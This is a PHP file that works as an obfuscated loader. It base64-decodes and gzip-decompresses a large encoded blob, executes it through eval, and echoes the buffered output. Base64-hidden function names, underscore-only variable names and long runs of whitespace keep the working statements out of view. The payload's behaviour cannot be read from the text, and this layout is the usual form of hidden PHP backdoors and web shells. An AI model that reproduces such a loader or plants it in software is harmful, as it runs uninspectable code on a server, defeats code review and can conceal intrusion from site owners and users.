<?php 
        $__='printf';$_='Loading This code is encrypted!';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';
                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';
        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;